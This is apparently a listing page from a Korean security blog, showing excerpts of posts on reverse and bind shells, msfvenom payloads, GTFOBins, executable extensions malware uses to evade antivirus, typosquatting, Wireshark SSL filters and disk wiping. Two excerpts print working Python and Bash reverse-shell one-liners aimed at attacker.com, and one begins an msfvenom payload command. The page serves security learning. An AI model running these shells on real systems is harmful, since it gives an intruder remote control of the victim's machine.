본문 바로가기

728x90

🔒정보보안108

시스템 보안 - 파이썬 리버스 쉘 스크립트 export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' 대부분의 유닉스 계열의 OS(리눅스, 맥os)에는 python2는 설치가 되어있는 경우가 많으니 별도의 설치 없이 명령어만으로 사용 가능하다. 출처: https://gtfobins.github.io/gtfobins/python/#reverse-shell python | GTFOBins Run socat file:`tt.. 2023. 1. 25.

시스템 보안 - 메타스플로잇 msfvenom 리버스 쉘 제작 명령어 출처: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n… infinitelogins.com 윈도우 msfvenom -p windows/meterp.. 2023. 1. 24.

보안 - GTFOBins, 시스템 보안 무력화 명령어 모음들 https://gtfobins.github.io/ GTFOBins pg Shell File read SUID Sudo gtfobins.github.io 예시) Bash 리버스 쉘 활성화 명령어 export RHOST=attacker.com export RPORT=12345 bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT 2023. 1. 22.

웹 보안 - 바인드 쉘, 리버스 쉘, 더블 리버스 쉘 바인드 셸은 타깃 디바이스에 설치된 셸의 일종이다. 공격 대상이 되는 호스트의 특정 포트에 바인딩돼 디바이스에 대해 수신 대기하며, 해커는 원격으로 이 웹셸에 액세스해 대상 호스트에서 스크립트를 실행하는 데 사용할 수 있다. 리버스 셸은 공격자가 보안 취약점을 이용해 호스트 컴퓨터에 원격으로 연결할 수 있도록 한 후, 공격자가 자산의 포트를 열면 호스트 컴퓨터가 공격자의 포트에 접속하는 방식이다. 그 이후 공격자는 피해자의 컴퓨터를 마음대로 조종할 수 있다. 더블 리버스 셸은 공격 대상이 되는 호스트가 해커로부터 공격을 받는 포트가 아닌 별도의 포트로 해커의 장치에 연결되는 것이다. 따라서 입력 트래픽 포트와 출력 트래픽 포트 등 서로 다른 두 개의 연결포트가 있다. 웹셸을 서버에 올리는 방법은 파일 업.. 2022. 12. 5.

보안 - 침해사고 대응법 도서 "삐뽀삐뽀 보안 119" 리뷰 삐뽀삐뽀 보안 119 삐뽀삐뽀 보안 119, 악성 코드, 해킹, 피싱, 랜섬웨어, 디도스를 대비하는 우리의 자세를 알아보는 책을 읽어 보았다. 최근에 더더욱 보안에 관심을 가지게 되면서 사이버 보안 관련 자료들을 인터넷에서 찾아왔지만 부족한 점이 많다고 느껴 저서 보안 관련 전문가가 집필한 이 책을 선택하게 되었다. 책은 예제와 그림 자료가 있어서 더 이해하기가 쉽고, 무엇보다도 더욱 마음에 들었던 점은 대응 방법이 적혀 있는 것! 마찬가지로 사진으로 설명되어 있어서 그대로 따라 하기만 하면 손쉬운 사고 대응이 가능했다. 책의 이름이 "삐뽀삐뽀 보안 119"인 이유가 119가지 보안 위협 사례를 다루기 때문에 붙여진 이름이며, 목차를 보면 알겠지만 정~~~~말 다양한 위협 사례들을 다룬다. 우리에게 익숙.. 2022. 10. 9.

시스템 보안 - EXE 확장자를 대체하는 확장자들(SCR, COM, BAT) .exe 형태의 실행 프로그램 말고도 .scr과 .com으로도 동일한 실행 결과를 가져올 수 있다. .scr .scr은 화면 보호기 즉 Windows Screensaver를 의미하지만 마찬가지로 포맷 종류가 실행 파일 형태라서 .exe 파일의 확장자를 .scr로 바꿔만 줘도 똑같이 실행이 잘 된다. 이를 악용하여 백신 프로그램이 .exe를 우선적으로 검사한다는 것을 우회하기 위해서 .scr을 대신 사용하는 멀웨어도 존재한다. .com .com은 DOS Command File으로 .scr과 마찬가지로 실행 파일 포맷을 가지고 있어서 .exe 파일을 .com으로 바꿔줘도 동일하게 실행된다. 원래는 DOS 환경에서 자주 사용되던 확장자이었다고 한다. 우리가 자주 사용하는 인터넷 도메인 ".com"과는 다른 것.. 2022. 10. 7.

시스템 보안 - Jscript Jscript는 ECMA스크립트 표준에 기반을 둔 스크립팅 언어이기 때문에 Javascript과 문법이 똑같다. 게다가 둘 다 브라우저에서 실행시키는 스크립트 언어인 것도 동일하다. (Jscript: 마이크로소프트 개발, Javascript: 넷스케이프 개발) 하지만 둘이 같다고 할 수는 없는 게 Jscript는 시스템 내에 외부 프로그램을 실행시킬 수 있는 WScript(윈도우 스크립트 호스트)를 추가한 언어라는 점. 예시로 Jscript는 인터넷 익스플로러에서 쓰이는데(지금은 사용 중단했지만) 우리가 은행 사이트에 들어가게 되면 컴퓨터에 깔려있는 보안 프로그램과 상호작용을 하게 되는데 이게 WScript 덕분에 가능한 일이다. 가끔 윈도우에서 .js 파일을 확인하면 아래처럼 뭔가 아이콘도 있고 한데 .. 2022. 10. 6.

웹 보안 - IP 기반 검증 도구(criminalip) https://criminalip.com 주소나 아이피를 입력하면 위험도를 분석하여 알려주는 사이트다. 2022. 10. 6.

웹 보안 - 타이포스쿼팅(Typosquatting) 사용자가 도메인 주소를 실수로 잘못 입력을 하는 것을 악용하여 잘못 입력된 주소의 사이트에 바이러스를 심어 다운로드를 유도하는 공격 방식이다. 대표적으로 google.com을 실수로 잘못 입력한 goggle.com, gooogle.com 등 이 있다. 매그니베르(Magniber)라는 랜섬웨어 또한 타이포스쿼팅을 이용하여 다운로드를 유도하는 방식을 사용한다. https://asec.ahnlab.com/ko/39376/ 매그니베르(Magniber) 랜섬웨어 변경 (*.js -> *.wsf) - 09/28 - ASEC BLOG ASEC 분석팀은 지난 9월 8일 매그니베르 랜섬웨어가 CPL 확장자 에서 JSE 확장자로 변경됨을 블로그를 통해 소개한 바 있다. 공격자는 9월 8일 이후에도 지난 9월 16일에는 J.. 2022. 10. 6.

보안 - 무료 오픈소스 기반 소프트웨어(FOSS) 추천 사이트 모음 https://www.privacyguides.org/ Home Privacy Guides is your central privacy and security resource to protect yourself online. www.privacyguides.org https://www.privacytools.io/ Best Privacy Tools in 2022: Software Alternatives Usability: Is the app or service user-friendly and easy to use? A modern and well-designed interface makes it easy to understand for users and therefore can be widely adopt.. 2022. 9. 29.

네트워크 보안 - 와이어샤크(Wireshark) SSL handshake 필터 Useful Wireshark filter for analysis of SSL Traffic. Client Hello: ssl.handshake.type == 1 Server Hello: ssl.handshake.type == 2 NewSessionTicket: ssl.handshake.type == 4 Certificate: ssl.handshake.type == 11 CertificateRequest ssl.handshake.type == 13 ServerHelloDone: ssl.handshake.type == 14 Note: “ServerHellpDone” means full-handshake TLS session. Cipher Suites: ssl.handshake.ciphersuite I fo.. 2022. 9. 22.

디지털 포렌식 - 휴대폰, 컴퓨터 저장 장치를 복구 불가능하게 만드는 방법 휴대폰 1. 공장 초기화 2. 영어 대소문자 + 숫자 + 특수문자 비밀번호 암호화 12자리 이상 3. 휴대폰 재부팅 혹은 종료 - 휴대폰에 삽입했던 SD 카드는 밑의 방법을 따른다. 컴퓨터(HDD, SDD, SD 카드) 0. BitLocker 암호화 1. 윈도우 자체 기능인 "빠른 포맷" 사용 2. 로우 포맷 3번 이상(혹은 cipher 명령어 사용 "cipher /w:드라이브명:" ) 3. 강자석으로 하드디스크의 자성을 망가트린다. 4. 드릴로 디스크를 물리적으로 파괴 참고: https://syki66.github.io/blog/2020/08/10/make-disk-irrecoverable.html 저장장치에서 포렌식으로도 복구 불가능하게 파일 및 폴더 완전 삭제하기 - syki66 blog 일반적인 .. 2022. 9. 16.

이전 1 2 3 4 5 6 7 8 9 다음

728x90

티스토리툴바